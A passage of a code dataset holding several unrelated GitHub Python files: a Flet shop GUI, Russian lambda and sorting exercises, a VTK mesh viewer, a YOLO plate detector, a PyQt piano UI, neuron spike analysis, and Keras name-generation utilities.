plt.show()","repo_name":"RightMesh/payment-channel-performance","sub_path":"web/plot_time.py","file_name":"plot_time.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"20528565321","text":"import flet as ft\n\n\ndef main(page: ft.Page):\n page.title=\"Bienvenido a su frutería de confianza!\"\n caja_número_1= ft.TextField(value=\"0\", text_align=ft.TextAlign.RIGHT, width=100)\n caja_número_2= ft.TextField(value=\"0\", text_align=ft.TextAlign.RIGHT, width=100)\n caja_número_3= ft.TextField(value=\"0\", text_align=ft.TextAlign.RIGHT, width=100)\n caja_número_4= ft.TextField(value=\"0\", text_align=ft.TextAlign.RIGHT, width=100)\n caja_número_5= ft.TextField(value=\"0\", text_align=ft.TextAlign.RIGHT, width=100)\n def menus_click_1(e):\n caja_número_1.value = str(int(caja_número_1.value) - 1) \n page.update()\n\n def plus_click_1(e):\n caja_número_1.value = str(int(caja_número_1.value) + 1)\n page.update()\n \n def menus_click_2(e):\n caja_número_2.value = str(int(caja_número_2.value) - 1) \n page.update()\n\n def plus_click_2(e):\n caja_número_2.value = str(int(caja_número_2.value) + 1)\n page.update()\n \n def menus_click_3(e):\n caja_número_3.value = str(int(caja_número_3.value) - 1) \n page.update()\n\n def plus_click_3(e):\n caja_número_3.value = str(int(caja_número_3.value) + 1)\n page.update()\n \n def menus_click_4(e):\n caja_número_4.value = str(int(caja_número_4.value) - 1) \n page.update()\n\n def plus_click_4(e):\n caja_número_4.value = str(int(caja_número_4.value) + 1)\n page.update()\n \n def menus_click_5(e):\n caja_número_5.value = str(int(caja_número_5.value) - 1) \n page.update()\n\n def plus_click_5(e):\n caja_número_5.value = str(int(caja_número_5.value) + 1)\n page.update()\n def finalizar_Compra():\n print(vCompra)\n\n\n \n \n \n \n vCompra=[]\n def añadir_producto(e):\n if dropDownMenúVerduras.value!=None:\n vCompra.append(dropDownMenúVerduras.value)\n dropDownMenúVerduras.clean\n else:\n print(\"No ha seleccionado nada.\")\n \n \n \n botón_Añadir_Verduras=ft.FilledButton(text=\"Añadir\", icon=\"Añadir\", on_click=añadir_producto)\n botón_Añadir_Carnes=ft.FilledButton(text=\"Añadir\", icon=\"Añadir\", on_click=añadir_producto)\n botón_Añadir_Pescados=ft.FilledButton(text=\"Añadir\", icon=\"Añadir\", on_click=añadir_producto)\n botón_Añadir_Cervezas=ft.FilledButton(text=\"Añadir\", icon=\"Añadir\", on_click=añadir_producto)\n botón_Añadir_Botellas=ft.FilledButton(text=\"Añadir\", icon=\"Añadir\", on_click=añadir_producto)\n botón_Finalizar_Compra=ft.FilledButton(text=\"Finalizar Compra\", icon=\"Añadir\", on_click=finalizar_Compra)\n \n\n\n #Componente Texto\n texto_Título =ft.Text(value=\"Buenas caballero, ¿qué desea comprar?\", color=\"black\", size=20)\n page.add(texto_Título)#add hace dos cosas: 1- Añadir 2- Actualizar\n \n texto_Título_Sección_Verduras=ft.Text(value=\"sección de Verduras\", color=\"black\", size=20)\n page.add(texto_Título_Sección_Verduras)\n\n\n dropDownMenúVerduras = ft.Dropdown(width=300, options=[ft.dropdown.Option(\"lechuga 0,9$/kg\"),\n ft.dropdown.Option(\"naranjas 2$/kg\"),\n ft.dropdown.Option(\"alcachofas 0,9$/kg\"),\n ft.dropdown.Option(\"moras 50$/kg\"),\n ft.dropdown.Option(\"pepinillos 1,2$/kg\"),\n ft.dropdown.Option(\"tomate para el mejor gazpacho 2$/kg\")])\n fila1 = ft.Row(spacing=50, controls=[dropDownMenúVerduras,botón_Añadir_Verduras] ) \n page.add(fila1)\n page.add(\n ft.Row(\n [ft.IconButton(ft.icons.REMOVE, on_click=menus_click_1),caja_número_1,\n ft.IconButton(ft.icons.ADD, on_click=plus_click_1)],\n alignment=ft.MainAxisAlignment.CENTER))\n \n \n texto_Título_Sección_Pescados=ft.Text(value=\"sección de Pescados\", color=\"black\", size=20)\n 
page.add(texto_Título_Sección_Pescados)\n dropDownMenúPescados = ft.Dropdown(width=400, options=[ft.dropdown.Option(\"Almejas 20$/kg\"),\n ft.dropdown.Option(\"Sardinas 50$/kg\"),\n ft.dropdown.Option(\"Calamares 50$/kg\"),\n ft.dropdown.Option(\"Gambones 100$/kg\"),\n ft.dropdown.Option(\"Aleta de Tiburón 5000$/kg\"),\n ft.dropdown.Option(\"Atún Rojo 100.000.$/kg\")])\n fila2 = ft.Row(spacing=0, controls=[dropDownMenúPescados,botón_Añadir_Pescados] ) \n page.add(fila2)\n page.add(\n ft.Row(\n [ft.IconButton(ft.icons.REMOVE, on_click=menus_click_2),caja_número_2,\n ft.IconButton(ft.icons.ADD, on_click=plus_click_2)],\n alignment=ft.MainAxisAlignment.CENTER))\n \n\n\n \n\n\n texto_Título_Sección_Carnes=ft.Text(value=\"sección de Carnes\", color=\"black\", size=20)\n page.add(texto_Título_Sección_Carnes)\n dropDownMenúCarnes = ft.Dropdown(width=400, options=[ft.dropdown.Option(\"Pechiga 10$/kg\"),\n ft.dropdown.Option(\"rabo de Toro 50$/kg\"),\n ft.dropdown.Option(\"Carne de Hereford 75$/kg\"),\n ft.dropdown.Option(\"Carne de Angus 100$/kg\"),\n ft.dropdown.Option(\"Carne de Ozaki 50.000$/kg\"),\n ft.dropdown.Option(\"Carne de Kobe 1000.000$/kg\")])\n fila3 = ft.Row(spacing=0, controls=[dropDownMenúCarnes,botón_Añadir_Carnes] ) \n page.add(fila3)\n page.add(\n ft.Row(\n [ft.IconButton(ft.icons.REMOVE, on_click=menus_click_3),caja_número_3,\n ft.IconButton(ft.icons.ADD, on_click=plus_click_3)],\n alignment=ft.MainAxisAlignment.CENTER))\n \n \n\n \n texto_Título_Sección_Cervezas=ft.Text(value=\"sección de Cervezas\", color=\"black\", size=20)\n page.add(texto_Título_Sección_Cervezas)\n dropDownMenúCervezas = ft.Dropdown(width=400, options=[ft.dropdown.Option(\"Mahou 1$/unidad\"),\n ft.dropdown.Option(\"Cruzcampo 1$/unidad\"),\n ft.dropdown.Option(\"Estrella Galicia 10$/unidad\"),\n ft.dropdown.Option(\"Alhambra 10$/unidad\"),\n ft.dropdown.Option(\"Salto Stout 20$/unidad\"),\n ft.dropdown.Option(\"Heineken 30$/unidad\")])\n fila4 = ft.Row(spacing=0, controls=[dropDownMenúCervezas,botón_Añadir_Cervezas] ) \n page.add(fila4)\n page.add(\n ft.Row(\n [ft.IconButton(ft.icons.REMOVE, on_click=menus_click_4),caja_número_4,\n ft.IconButton(ft.icons.ADD, on_click=plus_click_4)],\n alignment=ft.MainAxisAlignment.CENTER))\n \n \n \n\n texto_Título_Sección_Botellas=ft.Text(value=\"sección de Botellas\", color=\"black\", size=20)\n page.add(texto_Título_Sección_Botellas)\n dropDownMenúBotellas = ft.Dropdown(width=400, options=[ft.dropdown.Option(\"Barcelo 12$/unidad\"),\n ft.dropdown.Option(\"Bombay 20$/unidad\"),\n ft.dropdown.Option(\"Beefeter 150$/unidad\"),\n ft.dropdown.Option(\"champagne Francés 80$/unidad\"),\n ft.dropdown.Option(\"Jageer 20$/unidad\"),\n ft.dropdown.Option(\"Tequila 30$/unidad\")])\n fila5 = ft.Row(spacing=0, controls=[dropDownMenúBotellas,botón_Añadir_Botellas] ) \n page.add(fila5)\n page.add(\n ft.Row(\n [ft.IconButton(ft.icons.REMOVE, on_click=menus_click_5),caja_número_5,\n ft.IconButton(ft.icons.ADD, on_click=plus_click_5)],\n alignment=ft.MainAxisAlignment.CENTER))\n\n\n #slider_Botellas=ft.Slider(min=0, max=50,divisions=50, label=\"Unidades{value}\")\n #page.add(slider_Botellas)\n\n\n\n fila6 = ft.Row(spacing=250, controls=[botón_Finalizar_Compra] ) \n page.add(fila6)\n \n \n\n \n\n\n\nft.app(target=main)","repo_name":"Albertoguiradoo/Ejemplo-Git_a","sub_path":"aplicacion_frutería.py","file_name":"aplicacion_frutería.py","file_ext":"py","file_size_in_byte":8795,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
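The five copy-pasted menus_click/plus_click pairs in the record differ only in which TextField they touch; a closure factory removes the duplication. A sketch using only flet pieces already present in the record:

```python
import flet as ft

def make_counter(page: ft.Page):
    # Returns one quantity box plus its +/- row; call it five times
    # instead of hand-writing menus_click_1..5 and plus_click_1..5.
    box = ft.TextField(value="0", text_align=ft.TextAlign.RIGHT, width=100)

    def change(delta):
        def handler(e):
            box.value = str(int(box.value) + delta)
            page.update()
        return handler

    row = ft.Row(
        [ft.IconButton(ft.icons.REMOVE, on_click=change(-1)),
         box,
         ft.IconButton(ft.icons.ADD, on_click=change(+1))],
        alignment=ft.MainAxisAlignment.CENTER,
    )
    return box, row
```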
+{"seq_id":"70716740148","text":"# Задача 1. Однострочный код\n#\n# Пользователь вводит неопределённое количество чисел. Напишите код, который запрашивает эти числа и сортирует их по возрастанию.\n# Реализуйте решение в одну строку.\n#\n#\n#\n# Пример работы консоли:\n#\n# Введите числа: 5 8 4 1 0 3\n#\n# [0, 1, 3, 4, 5, 8]\n#\n#\n#\n\nnumbers = input(\"Введите числа: \")\nprint(sorted(list(map(int, numbers.split()))))\n\n# Задача 2. Однострочный код 2\n#\n# Пользователь вводит строку, состоящую из любых символов. Напишите код, который выводит на экран список этих символов,\n# исключая цифры и буквы в верхнем регистре.\n#\n#\n#\n# Пример работы консоли:\n#\n# Введите строку: qWe456rtY\n#\n# ['q', 'e', 'r', 't']\n#\n#\n#\n\ntext = input(\"Введите строку: \")\n\nprint(list(filter(lambda x: not (x.isupper() or x.isdigit()), text)))\n\n# Задача 3. Функция reduce\n#\n# Помимо map и filter, есть ещё одна функция — reduce. Она применяет указанную функцию к элементам последовательности,\n# сводя её к единственному значению. Однако используют reduce довольно редко. Начиная с третьей версии Python,\n# эту функцию даже вынесли из встроенных функций в модуль functools.\n#\n#\n#\n# Пример кода с reduce:\n\nfrom functools import reduce\nfrom typing import List\n\n\ndef my_add(a: int, b: int) -> int:\n result = a + b\n print(f\"{a} + {b} = {result}\")\n return result\n\n\nnumbers: List[int] = [0, 1, 2, 3, 4]\nprint(reduce(my_add, numbers))\n#\n#\n#\n# Результат:\n#\n# 0 + 1 = 1\n#\n# 1 + 2 = 3\n#\n# 3 + 3 = 6\n#\n# 6 + 4 = 10\n#\n# 10\n#\n#\n#\n# Используя функцию reduce, реализуйте код, который считает, сколько раз слово was встречается в списке:\n#\n#\n#\nsentences = [\"Nory was a Catholic\", \"because her mother was a Catholic\",\n \"and Nory’s mother was a Catholic\", \"because her father was a Catholic\",\n \"and her father was a Catholic\", \"because his mother was a Catholic\", \"or had been\"]\n\n\ndef check_was(a, b):\n if isinstance(a, str): # обработаем первый элемент отдельно\n a = int(a.count('was'))\n print(a, '************', b)\n result = a + int(b.count('was'))\n return result # т.к. мы возвращаем int - то дальше 'a' всегда будет int-ом, а в 'b' будет новая строка\n\n\nprint(reduce(check_was, sentences))\n\n\n# Задача 1. Минимум и максимум\n#\n# Мы знаем, что для нахождения минимального и максимального значений в наборе данных можно использовать две встроенные функции:\n# min() и max(). 
И у них тоже можно использовать именованный аргумент key.\n#\n#\n#\n# Скажем, дан вот такой список, в котором хранятся результаты соревнований в виде словарей:\n#\n#\n#\n# grades: Dict[str, Union[str, int]] = [{'name': 'Kenneth', 'score': 3}, {'name': 'Bebe', 'score': 41},\n# {'name': 'Joyce', 'score': 24}, {'name': 'Richard', 'score': 37}, {'name': 'Marian', 'score': 44}, {'name': 'Jana', 'score': 45},\n#\n# {'name': 'Sarah', 'score': 90}, {'name': 'Eddie', 'score': 2}, {'name': 'Mary', 'score': 63},\n#\n# {'name': 'Ronald', 'score': 15}, {'name': 'David', 'score': 44}, {'name': 'Richard', 'score': 78},\n#\n# {'name': 'Warren', 'score': 7}, {'name': 'Alyssa', 'score': 13}, {'name': 'Lloyd', 'score': 52},\n#\n# {'name': 'Vanessa', 'score': 6}, {'name': 'Karen', 'score': 40}, {'name': 'James', 'score': 54},\n#\n# {'name': 'Annie', 'score': 87}, {'name': 'Glenn', 'score': 9}, {'name': 'Bruce', 'score': 68},\n#\n# {'name': 'Ramona', 'score': 64}, {'name': 'Jeannie', 'score': 22}, {'name': 'Aaron', 'score': 3},\n#\n# {'name': 'Ronnie', 'score': 47}, {'name': 'William', 'score': 94}, {'name': 'Sandra', 'score': 40},\n#\n# ]\n#\n#\n#\n# Напишите код, который выводит на экран минимальное и максимальное количество очков из этого списка.\n# Используйте только встроенные функции и лямбда-функции, то есть реализуйте решение «в две строки».\n#\n#\n#\n\ngrades = [\n {'name': 'Kenneth', 'score': 3}, {'name': 'Bebe', 'score': 41}, {'name': 'Joyce', 'score': 24},\n {'name': 'Richard', 'score': 37}, {'name': 'Marian', 'score': 44}, {'name': 'Jana', 'score': 45},\n {'name': 'Sarah', 'score': 90}, {'name': 'Eddie', 'score': 2}, {'name': 'Mary', 'score': 63},\n {'name': 'Ronald', 'score': 15}, {'name': 'David', 'score': 44}, {'name': 'Richard', 'score': 78},\n {'name': 'Warren', 'score': 7}, {'name': 'Alyssa', 'score': 13}, {'name': 'Lloyd', 'score': 52},\n {'name': 'Vanessa', 'score': 6}, {'name': 'Karen', 'score': 40}, {'name': 'James', 'score': 54},\n {'name': 'Annie', 'score': 87}, {'name': 'Glenn', 'score': 9}, {'name': 'Bruce', 'score': 68},\n {'name': 'Ramona', 'score': 64}, {'name': 'Jeannie', 'score': 22}, {'name': 'Aaron', 'score': 3},\n {'name': 'Ronnie', 'score': 47}, {'name': 'William', 'score': 94}, {'name': 'Sandra', 'score': 40},\n]\n# Решение через key\nprint(max(grades, key=lambda x: x[\"score\"]))\nprint(min(grades, key=lambda x: x[\"score\"]))\n# Вывод исключительно очков:\nprint(max(grades, key=lambda x: x[\"score\"])['score'])\nprint(min(grades, key=lambda x: x[\"score\"])['score'])\n\n# Решение через map, который будет изучен в следующем модуле\nprint(list(map(lambda x: x['score'], grades))) # для наглядности\nprint(max(map(lambda x: x['score'], grades)))\nprint(min(map(lambda x: x['score'], grades)))\nprint(grades)\n\n# Задача 2. Сортировка\n#\n# Таблица базы данных состоит из строк, в которых хранится информация о каждом человеке: его имя, возраст и остальные данные.\n# Вас попросили реализовать для этой базы сортировку по возрасту (по убыванию и по возрастанию).\n#\n# Реализуйте класс Person с соответствующей инициализацией, а также сеттерами и геттерами.\n# Затем создайте список из хотя бы трёх людей и отсортируйте их. 
print('*' * 100)\nprint(dir('.'))  # note: dir('.') lists str methods; dir(__builtins__) inspects the built-in namespace the task asks about\nprint('*' * 100)\nprint(locals())\nprint('*' * 100)\nprint(globals())\n","repo_name":"gnatagnaro/Python_Basic","sub_path":"Module30/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10085,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"}
+{"seq_id":"40922219364","text":"import dash\nimport dash_html_components as html\nimport dash_vtk\nimport pyvista as pv\nfrom dash_vtk.utils import to_mesh_state\nfrom pyvista import examples\ntry:\n # VTK 9+\n from vtkmodules.vtkImagingCore import vtkRTAnalyticSource\nexcept ImportError:\n # VTK =< 8\n from vtk.vtkImagingCore import vtkRTAnalyticSource\n\n\n# Use VTK to get some data\ndata_source = vtkRTAnalyticSource()\nprint(type(data_source))\ndata_source.Update() # <= Execute source to produce an output\ndataset = data_source.GetOutput()\n\n#Reading STL files with pyvista .... \nmesh_pv = pv.read(r'C:/Users/Public/PI/Microscope/E-727/GCS_LabVIEW/MicrofabricationSoftware/3D_examples_models/dinolowRes.stl')\n#grafon = examples.download_dragon()\n# Use helper to get a mesh structure that can be passed as-is to a Mesh\n# RTData is the name of the field\nmesh_state = to_mesh_state(mesh_pv)\n\nprint(\"Mesh state\", type(mesh_state))\ncontent = dash_vtk.View([\n dash_vtk.GeometryRepresentation([\n dash_vtk.Mesh(state=mesh_state)\n ]),\n])\n\n# Dash setup\napp = dash.Dash(__name__)\nserver = app.server\n\napp.layout = html.Div(\n style={\"width\": \"100%\", \"height\": \"400px\"},\n children=[content],\n)\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","repo_name":"Riloro/Two_Photon_Polymerization","sub_path":"MicrofabricationSoftware/scriptFabrication.py","file_name":"scriptFabrication.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"30460370743","text":"import cv2\nimport glob\nimport random\nimport numpy as np\nimport os\n\ndef save_detected_image(img, filename):\n if 'b' in filename:\n cv2.imwrite(f'detected/1/{filename}', img)\n if 'c' in filename:\n cv2.imwrite(f'detected/2/{filename}', img)\n if 'b' not in filename and 'c' not in filename:\n cv2.imwrite(f'detected/0/{filename}', img)\n\n\ndef main():\n net = cv2.dnn.readNet('weights/yolov4-lp2_best.weights', 'yolov4-lp2.cfg')\n net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\n net.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n model = cv2.dnn_DetectionModel(net)\n model.setInputParams(size=(608, 608), scale=1/255)\n\n zero_images = glob.glob('alldataset/0/*.jpg')\n one_images = glob.glob('alldataset/1/*.jpg')\n two_images = glob.glob('alldataset/2/*.jpg')\n all_images = zero_images + one_images + two_images\n random.shuffle(all_images)\n\n for image in all_images:\n img = cv2.imread(image)\n classes, confidences, boxes = model.detect(img, 0.2, 0.2)\n if len(classes) == 0:\n save_detected_image(img, os.path.basename(image))\n continue\n for class_id, confidence, box in zip(classes.flatten(), confidences.flatten(), boxes):\n label = '%.2f' % confidence\n label = '%s: %s' % (names[class_id], label)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n left, top, width, height = box\n top = max(top, labelSize[1])\n cv2.rectangle(img, box, color=(0, 255, 0), thickness=2)\n cv2.rectangle(img, (left, top - labelSize[1]), (left + labelSize[0], top + baseLine), (255, 255, 255), cv2.FILLED)\n cv2.putText(img, label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0))\n save_detected_image(img, os.path.basename(image))\n\n\nif __name__ == '__main__':\n main()","repo_name":"cuddly-goggles/anpr","sub_path":"detected.py","file_name":"detected.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"93"}
+{"seq_id":"2387619511","text":"from PyQt5.QtWidgets import QMainWindow, QApplication\nfrom PyQt5.QtGui import QIcon\nimport sys\nimport os\nfrom interface.src.Piano import Piano\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\n\n\ndef resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS',\n os.path.dirname(os.path.abspath(__file__))\n )\n return os.path.join(base_path, relative_path)\n\nclass Interface(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setCentralWidget(Piano())\n self.resize(1500, 750)\n self.move(5, 125)\n self.setFixedSize(self.width(), self.height())\n self.setWindowIcon(QIcon(resource_path('icon/gramophone.png')))\n self.setWindowTitle('MusicCritique Interface')\n self.show()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Interface()\n ex.setWindowOpacity(0.95)\n sys.exit(app.exec_())","repo_name":"josephding23/SimplePianoUI","sub_path":"interface/src/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"93"}
+{"seq_id":"21354416918","text":"\"\"\"Modified from 'Basic example 1 for eFEL'.\"\"\"\r\n\r\nimport efel\r\nimport numpy\r\nimport matplotlib.pyplot as plt\r\n\r\ndef avg_and_rms(x):\r\n N = len(x)\r\n avgx = numpy.mean(x)\r\n rmsx = 0\r\n for i in range(N):\r\n rmsx += (avgx-x[i])**2\r\n rmsx = numpy.sqrt(rmsx/(N-1))\r\n return avgx,rmsx\r\n\r\ndef main(filename,idelay,idur):\r\n \"\"\"Main\"\"\"\r\n\r\n # Use numpy to read the trace data from the txt file\r\n data = numpy.loadtxt(filename)\r\n\r\n # Time is the first column\r\n time = data[:, 0]\r\n # Voltage is the second column\r\n voltage = data[:, 1]\r\n \r\n # Now we will construct the datastructure that will be passed to eFEL\r\n\r\n # A 'trace' is a dictionary\r\n trace1 = {}\r\n\r\n # Set the 'T' (=time) key of the trace\r\n trace1['T'] = time\r\n\r\n # Set the 'V' (=voltage) key of the trace\r\n trace1['V'] = voltage\r\n\r\n # Set the 'stim_start' (time at which a stimulus starts, in ms)\r\n # key of the trace\r\n # Warning: this need to be a list (with one element)\r\n trace1['stim_start'] = [idelay]\r\n\r\n # Set the 'stim_end' (time at which a stimulus end) key of the trace\r\n # Warning: this need to be a list (with one element)\r\n trace1['stim_end'] = [idelay+idur]\r\n\r\n # Multiple traces can be passed to the eFEL at the same time, so the\r\n # argument should be a list\r\n traces = [trace1]\r\n\r\n # Now we pass 'traces' to the efel and ask it to calculate the feature\r\n # values\r\n traces_results = efel.getFeatureValues(traces,\r\n ['peak_time','AP_amplitude', 'AP_duration_half_width', 'Spikecount', 'voltage_base'])\r\n ###### This is only printing. I do not really need it when I'm looping ##############\r\n '''\r\n # The return value is a list of trace_results, every trace_results\r\n # corresponds to one trace in the 'traces' list above (in same order)\r\n for trace_results in traces_results:\r\n # trace_result is a dictionary, with as keys the requested features\r\n for feature_name, feature_values in trace_results.items():\r\n #print('feature_values:',feature_values)\r\n if len(feature_values)!=0: # I changed this from if feature_values!=None:\r\n print(\"Feature %s has the following values: %s\" % \\\r\n (feature_name, ', '.join([str(x) for x in feature_values])))\r\n '''\r\n #####################################################################################\r\n trace_results = traces_results[0] # Because I am only looping over one cell, I guess\r\n # treat data and perform avg,rms where needed\r\n avg_AP_ampl, rms_AP_ampl = avg_and_rms(trace_results[\"AP_amplitude\"])\r\n avg_AP_halfwidth, rms_AP_halfwidth = avg_and_rms(trace_results[\"AP_duration_half_width\"])\r\n Nspikes = trace_results[\"Spikecount\"]\r\n Nspikes = Nspikes[0]\r\n return Nspikes, avg_AP_ampl, rms_AP_ampl, avg_AP_halfwidth, rms_AP_halfwidth\r\n\r\n\r\nif __name__ == '__main__':\r\n testmodel = 496497595 # 488462965 #\r\n idur = 1000 # ms\r\n idelay = 1\r\n iamp = 0.02 # nA\r\n v_init = -70 #-86.5 # mV\r\n Ra = 100 # -150\r\n somasize = 10\r\n \r\n # Default HH values:\r\n ena = 50\r\n ek = -77\r\n el_hh = -54.3\r\n gnabar_hh = 0.12\r\n gkbar_hh = 0.036\r\n gl_hh = 0.0003\r\n \r\n ### Change HH values here: ####\r\n #ena = 20\r\n #ek = -70\r\n #el_hh = -70\r\n #gnabar_hh = 0.14\r\n #gkbar_hh = 0.036*2\r\n #gl_hh = 0.000003\r\n \r\n iamps = [0.02,0.04,0.06,0.08,0.1,0.12,0.14,0.16,0.18]\r\n cms = [0.8,0.9,1.0,1.1,1.2,1.25,1.3,1.4,1.5]\r\n \r\n NCms = len(cms)\r\n Namps = len(iamps)\r\n slopes = numpy.zeros(Namps)\r\n \r\n outfolder = 
'Results/IStim/Soma%i/Vary_iamp/'%somasize\r\n outfilename = outfolder+'Cmslopes_vs_iamp.txt'\r\n plotname = outfolder+'Cmslopes_vs_iamp.png'\r\n outfile = open(outfilename,'w')\r\n for k in range(Namps):\r\n iamp = iamps[k]\r\n Nspikes = numpy.zeros(NCms)\r\n avg_AP_ampl = numpy.zeros(NCms)\r\n rms_AP_ampl = numpy.zeros(NCms)\r\n avg_AP_halfwidth = numpy.zeros(NCms)\r\n rms_AP_halfwidth = numpy.zeros(NCms)\r\n \r\n # Set names\r\n hhstring = '_ena'+str(ena)+'_ek'+str(ek)+'_el'+str(el_hh)+'_gnabar'+str(gnabar_hh)+'_gkbar'+str(gkbar_hh)+'_gl'+str(gl_hh)\r\n folder = 'Results/IStim/Soma%i/current_idur'%somasize+str(idur)+'_iamp'+str(iamp)+'/'\r\n # make files\r\n for j in range(NCms):\r\n print('Step ', j+1, ' of', NCms)\r\n cm = cms[j]\r\n filename = folder+'somaonly_cm'+str(cm)+'_idur%i_iamp'%idur+str(iamp)+hhstring+'_Ra'+str(Ra)+'_vinit'+str(v_init)+'_V.txt' \r\n Nspikes[j], avg_AP_ampl[j], rms_AP_ampl[j], avg_AP_halfwidth[j], rms_AP_halfwidth[j] = main(filename,idelay,idur)\r\n \r\n a = (Nspikes[2]-Nspikes[0])/(cms[2]-cms[0])\r\n print('Slope, iamp=',iamp, ': ', a) # Loop this?\r\n slopes[k] = a\r\n outfile.write('%.2f %.2e\\n' % (iamp,a))\r\noutfile.close()\r\n\r\nplt.figure(figsize=(6,5))\r\nplt.plot(iamps,slopes,'-o')\r\nplt.xlabel(r'$I$ (nA)')\r\nplt.ylabel(r'Slope (Hz cm$^2$/$\\mu$F)')\r\nplt.savefig(plotname)\r\nplt.show()\r\n","repo_name":"KineOdegardHanssen/PhD-subprojects","sub_path":"P3_NEURON/efel_analysis_varyCm_all_somaonly_varyhh_findslopes.py","file_name":"efel_analysis_varyCm_all_somaonly_varyhh_findslopes.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"93"}
+{"seq_id":"38648935335","text":"import matplotlib.pyplot as pyplot\nimport shutil\nimport keras\nimport json\nimport datetime\nimport psutil\nimport os\nimport time\nimport operator\n\nfrom keras_preprocessing.sequence import pad_sequences\nimport numpy as np\n\ndef valid_char(ch):\n return ch >= 'A' and ch <= 'Z' or ch.isspace() or ch >= '0' and ch <= '9'\n\ndef valid_string(name):\n return all([valid_char(ch) for ch in name])\n\n# for some reason these two functions are way faster than the keras char-level tokenizer\ndef map_char_to_int(texts,labels):\n char_counts = {}\n for text in texts:\n for char in text:\n char_counts[char] = char_counts[char] + 1 if char in char_counts else 1\n for char in labels:\n char_counts[char] = char_counts[char] + 1 if char in char_counts else 1\n char_counts_sorted = sorted(char_counts.items(), key=operator.itemgetter(1), reverse=True)\n char_to_int = {}\n int_to_char = ['?'] # reverse index\n for i, row in enumerate(char_counts_sorted):\n char_to_int[row[0]] = i + 1\n int_to_char.append(row[0])\n return char_to_int, int_to_char\n\n\n# for some reason these two functions are way faster than the keras char-level tokenizer\ndef texts_to_sequences(texts, char_to_int):\n sequences = []\n for text in texts:\n sequences.append([char_to_int[char] for char in text])\n return sequences\n\ndef save_training_plots(model_path):\n history = json.load(open(model_path + '/history.json'))\n\n for i in range(0, len(history['val_loss'])):\n history['val_loss'][i] = round(history['val_loss'][i], 3)\n history['val_acc'][i] = round(history['val_acc'][i], 3)\n history['loss'][i] = round(history['loss'][i], 3)\n history['acc'][i] = round(history['acc'][i], 3)\n\n pyplot.plot(history['acc'])\n pyplot.plot(history['val_acc'])\n pyplot.title('accuracy')\n pyplot.ylabel('accuracy')\n pyplot.xlabel('epoch')\n pyplot.legend(['train', 'validate'], loc='upper left')\n pyplot.savefig(model_path + '/acc.png', dpi=300)\n pyplot.clf() # I'm commenting that this means \"clear\" because it's a silly method name\n\n pyplot.plot(history['loss'])\n pyplot.plot(history['val_loss'])\n pyplot.title('loss')\n pyplot.ylabel('loss')\n pyplot.xlabel('epoch')\n pyplot.legend(['train', 'validate'], loc='upper left')\n pyplot.savefig(model_path + '/loss.png', dpi=300)\n pyplot.clf()\n\n\ndef save_history_file(model_path, history):\n with open(model_path + '/history.json', 'w') as handle:\n json.dump(history, handle)\n\n\ndef copy_model_to_latest(base_path, model_path, model_name):\n try:\n shutil.rmtree(base_path + '/' + model_name + '_latest')\n except:\n pass\n shutil.copytree(model_path, base_path + '/' + model_name + '_latest')\n\n\nclass SaveHistoryCheckpoint(keras.callbacks.Callback):\n def __init__(self, model_path, **kargs):\n super(SaveHistoryCheckpoint, self).__init__(**kargs)\n self.model_path = model_path\n self.init_time = time.time()\n self.history = {\n 'loss': [],\n 'acc': [],\n 'val_loss': [],\n 'val_acc': [],\n 'time': [],\n 'training_time': 0,\n #'total_time': total_time(),\n #'peak_memory': get_memory()\n }\n\n def on_epoch_end(self, epoch, logs={}):\n index = len(self.history)\n self.history['loss'].append(logs.get('loss'))\n self.history['acc'].append(logs.get('acc'))\n self.history['val_loss'].append(logs.get('val_loss'))\n self.history['val_acc'].append(logs.get('val_acc'))\n self.history['time'].append(time.time() - (self.history['time'][index - 1] if index else self.init_time))\n self.history['training_time'] = time.time() - self.init_time\n #self.history['total_time'] = 
\ndef convert_problem_to_name_input(holds):\n    # encode each problem as csv list of holds, followed by space, then name of the problem\n    hold_string = ','.join([hold['Description'] for hold in holds])\n    hold_string += ' '\n    return hold_string\n\ndef sample_from_prob_vec(pr):\n    # sample from output of model (ignoring very rare outcomes)\n    prob_thresh = np.max(pr, 1) * 0.1\n    pr[pr < prob_thresh] = 0\n    pr = (pr / pr.sum(axis=1, keepdims=1))[0]\n    idxs = np.arange(len(pr))\n    return np.random.choice(idxs, 1, p=pr)[0]\n\n# Take hold text (like 'A5,B8,D12,F14,I18 ', or the output of `convert_problem_to_name_input`) and generate a name\ndef name_text(text, model, char_to_int, int_to_char, max_length, end_token, prefix=None):\n    orig_len = len(text)\n    if prefix is not None:\n        prefix = prefix.upper()\n        if valid_string(prefix):\n            text += prefix\n    texts = [text]\n    # for each text, continue predicting until we reach max length or end token\n    final_texts = texts\n    while True:\n\n        sequences = texts_to_sequences(final_texts, char_to_int)\n        data = pad_sequences(sequences, maxlen=max_length)\n        predictions_list = model.predict(data)\n\n        ch = sample_from_prob_vec(predictions_list)\n        if len(sequences[0]) > max_length or ch == end_token:\n            break\n        final_texts[0] += int_to_char[ch]\n    return 